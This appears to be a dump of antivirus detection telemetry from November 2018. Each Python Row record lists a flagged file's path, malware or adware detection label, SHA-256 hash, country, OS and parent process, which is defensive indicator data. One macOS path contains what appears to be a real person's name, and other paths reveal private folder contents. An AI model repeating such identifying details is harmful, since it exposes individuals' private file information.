  Row(detection=Row(filename='project rubby 2.983 (1).exe', filepath='C:\\Users\\X\\Downloads\\Project RuBBy 2.983 (1).exe', filesize=320000, name='HEUR/AGEN.1015984.#M1.#R1'), hash='59c825e3e530f177f11965667c14361d385dfd53ae02730bd73b1c63e29bde59', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:56:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:45:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T06:45:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='jeks.exe', filepath='C:\\Documents and Settings\\X\\Application Data\\com2.{025A5937-A6BE-4686-A844-36FE4BEC8B6D}\\jeks.exe', filesize=8000000, name='TR/Dropper.Gen.#M300.#R3322'), hash='c3e96037801179753a4359185f793d195ae9aa07ccdb812c99feafdb1f93c0a3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:56:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mell.exe', filepath='C:\\Program Files (x86)\\Curtails\\mell.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='48b3294ebedde43151ade7342018800be31175d8f8f9b1fb075258e0ef1f65bb', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-04T17:54:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:46:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-102355-b99aa52f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_506666b0\\AVSCAN-20181104-102311-B272E1FD\\AVSCAN-20181104-102355-B99AA52F', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:23:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='winbox.exe', filepath='K:\\منصور جديد\\البرنامج كامل بالتحديث\\ملف التسطيب للبرنامج الجديد\\winbox.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='9db7872e4c795631636322f0749b1474bb244ee73cb40c5b652c377c83991848', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Baidu Security\\Baidu Antivirus\\5.4.3.148966.0\\BavSvc.exe', parentsize=2791312, timestamp='2018-11-04T11:41:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:03:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vstest.discoveryengine.x86.exe', filepath='C:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\vstest.discoveryengine.x86.exe', filesize=124000, name='W32/Neshta.A.#M1.#R1'), hash='9b272d97448aa008561dc2731c8b5948212d4c0791f28b0a52a1b73bc28acfd6', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:7s2Ufj7IgU2HVgcw.1', country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T11:25:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-110204-20436d9b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_671d5b24\\AVSCAN-20181104-110112-18FF7E25\\AVSCAN-20181104-110204-20436D9B', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='9bb403827bdf8c1112a659c220caaa0bef77a0c960175bdae55d23ca93973d52', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:02:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:20:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup337.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\1erwp2sc0ii\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:06:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T07:56:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T10:35:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202738-db845c78', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9be05e77\\AVSCAN-20181104-202719-D79A3402\\AVSCAN-20181104-202738-DB845C78', filesize=2176000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='86de3d5dc1678919598aab07ecffaaeaf0e05b1b907a73d8b2d933d7fccd3095', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:27:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='language.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\LANGUAGE\\LANGUAGE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='e82b3935870df0344fbde79f0ab41a998ccb9c9cace45fd749bac407960e27e4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7baa98f4b13364d95285aaaddce488a59c060804cb1c821d173bd7c56720b5d3', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7BAA98F4B13364D95285AAADDCE488A59C060804CB1C821D173BD7C56720B5D3', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7baa98f4b13364d95285aaaddce488a59c060804cb1c821d173bd7c56720b5d3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:51:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='veejsqce.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\veeJsQCE.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdfcreator-1_3_2_setup-downloader.exe', filepath='D:\\DJH\\OneDrive\\- DJH - DIVERSE SOFTWARE\\PDF CREATOR\\PDFCreator-1_3_2_setup-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='a3f1f27443b1201b01fefdae9e5b5f27a3ac6422359ea85a8f89a2d5d080e148', metadata=Row(cmdline='\\\\\\/background', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe', parentsize=1538656, timestamp='2018-11-02T16:20:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='icomboobject.dll', filepath='C:\\Microgaming\\Poker\\redstarpoker\\control\\icomboobject.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='c680cd43a2a262cb06a2d0c8f5b61dd8ddb013814b6c32f7736db553f6f6b66a', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Microgaming\\Poker\\redstarpoker\\mppoker.exe', parentsize=1214712, timestamp='2018-11-02T10:32:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='data.exe', filepath='F:\\DATA.EXE', filesize=1600000, name='TR/Crypt.CFI.Gen.#M300.#R2273'), hash='a8504fe17a19d3eefd1a43c116c9e6913de878d72a2f96cb02876be404e0adcf', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T16:16:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nsb12F2.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=8944344, timestamp='2018-11-02T15:50:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='level1.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL1\\LEVEL1.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='b4c443611f34d5e6385e54844cfdcf231e19804ecbaf809ba370391c5070bbf7', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='deletejobprinter.exe', filepath='E:\\HBCD\\Programs\\DeleteJobPrinter.exe', filesize=64000, name='TR/Agent.64000.119.#M1.#R1'), hash='892d3d7968ba29bd8e521710a5d9a62748c78fd4436a11cbc94c1ec4fb096f02', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:10:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-024907-841d13df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-024907-841D13DF', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='92c58c566fe837c7534fda77d61910d6f60faa502ba4106db032949794686293', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:51:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082640-e9cee8a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8bcab153\\AVSCAN-20181102-082006-C777EAE1\\AVSCAN-20181102-082640-E9CEE8A2', filesize=640000, name='Adware/Strictor.61989.92.#M1.#R1'), hash='a4e7bac2d8ef25b8185a5e6a436126a805f55c3d4299e847eb5a8ad20877ed88', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unwise.exe', filepath='\\?\\C:\\Program Files\\Yahoo!\\Messenger\\UNWISE.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='f4f24b0d99d88e117e68bf294a4996def5800efed870af24f3d3d46feca63801', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gotenks ssj.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Gotenks SSJ\\Gotenks SSJ.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='ed10620116ff807c926b797af19aff6d29c3d2376360ba0725cad89a8caae5ce', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:34:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='final.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Trunks\\final\\final.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='80b48bbb80ed2b360a73ec987b718c5da91efc9431fc6443c65a6742a95f88bb', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dgnnaiff.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\DgNNAiFf.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:04:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='njvxaebp.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\NJVXAEbP.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:32:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-145546-e4f40dcd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_426d22b5\\AVSCAN-20181102-145529-E2C797B1\\AVSCAN-20181102-145546-E4F40DCD', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:55:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered facod', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered facod', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='dc26e9b5291e93bbb8f1e419cf449550fd705fd81d2a415254b31a9604c2a82e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='syncversion.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\46A482~1\\syncversion.exe', filesize=640000, name='HEUR/AGEN.1032303.#M1.#R1'), hash='d7eed0f91289b70b10fac103e9b91ec850539828913e78600e0c095e6321fc7c', metadata=Row(cmdline=None, country='SN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:23:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='D:\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CZ.#M1.#R1'), hash='ea74978487a83ede72c7c95d321d0481ce24c66b678af4114b16d4f89b1e09a5', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-02T17:17:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='run-chess_bot_licensed_080.exe', filepath='C:\\Users\\X\\Documents\\ChessBot v0.80\\run-chess_bot_licensed_080.exe', filesize=320000, name='HEUR/APC.#M1.#R1'), hash='8c93d30360cf904d1d080c069a0de255e9ef173016b5c6dacd070e7fc6d4ac9a', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T15:14:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='dc86dd6c1b8d4af8cb1d2d250a3c78d9d21d5314f73bd753e4778c47942c098f', metadata=Row(cmdline='\\\\\\/Embedding', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-02T09:30:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='iucgrvop4x.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsx1468.tmp\\iucGrVOP4X.exe', filesize=2880000, name='TR/Crypt.XPACK.Gen2.#M300.#R100322'), hash='e8188847addfe132a90a1f201b0c9a49d0c62e843bec22b0ebabea7a95a25d2f', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Adobe Acrobat Pro DC 2019.008.20080 + Crack [CracksNow]\\Adobe Acrobat Setup\\Adobe Acrobat\\Setup.exe', parentsize=545317, timestamp='2018-11-02T08:26:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autopatcher.exe', filepath='c:\\users\\X\\downloads\\autopatcher.exe', filesize=1664000, name='TR/Atom.9dc47e.#M1.#R1'), hash='9dc47e9394bb92eda8086b876761e892682d045d4a35f4dac96194d2efee5669', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Python27\\python.exe', parentsize=27136, timestamp='2018-11-02T04:35:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tex.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\as\\Tex\\Tex.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='c8b2350b7e53a3d3f0a0a513ca9b707f15902e005370150621b869b8f1e6a9d8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='linh .exe', filepath='G:\\ANTOAN~1\\LINH\\LINH .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='c99b7d439ce01204c8eeb0d92b82227be2a7f08e77f8e3cfdd094632c6bbdcc3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:25:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mc01010.exe', filepath='C:\\NOVA PASTA\\MCPED10\\BK\\MC01010.EXE', filesize=6080000, name='W32/Sality.AT.#M1.#R1'), hash='9272f64ba6d3ff5aa5199363b1b185f1929a2ec4b45a4762d944964806089fad', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:54:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181541-695043a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0dde6b91\\AVSCAN-20181102-175827-0F3232B0\\AVSCAN-20181102-181541-695043A1', filesize=1280000, name='TR/Agent.anqai.#M1.#R1'), hash='bd25952768b6332da9a97a9234b8abe029fac840c7a5f025a8fc3937f543386b', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:15:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='downloader-fuer-mt.exe', filepath='D:\\PROG-SAMMLUNG-TOOLS\\!!!!!________NEUE SOFTWARE_!!!\\Downloader-fuer-mt.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='d90f8e1682e65d19a56efb2b3d456fbe6f2de93238f3db5c56c904c8adc72ccd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T14:15:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='вкр.exe', filepath='C:\\Users\\X\\Desktop\\кнспекты\\вкр\\вкр.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='fd3adfe5baf382fb94fff375be717ca38dc4954f5c595c53d065e346fe458879', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:m+TQjYJOvkif\\\\\\/cE8.1', country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T20:21:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181205-120826-e1105b67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c940481c\\AVSCAN-20181205-120802-DDE2DAF0\\AVSCAN-20181205-120826-E1105B67', filesize=64000, name='TR/ATRAPS.Gen.#M300.#R2775'), hash='baafe18271e42a08098929bd76db1a058cbc77015851267fe35a784edebf7532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:18:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-091658-1a42e627', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-091658-1A42E627', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:16:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f37bd445ff5707df09e0ad9fb4e0150a45a26785690bb7de4639d56d4b486d79', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\F37BD445FF5707DF09E0AD9FB4E0150A45A26785690BB7DE4639D56D4B486D79', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f37bd445ff5707df09e0ad9fb4e0150a45a26785690bb7de4639d56d4b486d79', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:33:27Z'), dt=datetime.date(2018, 11, 4)),
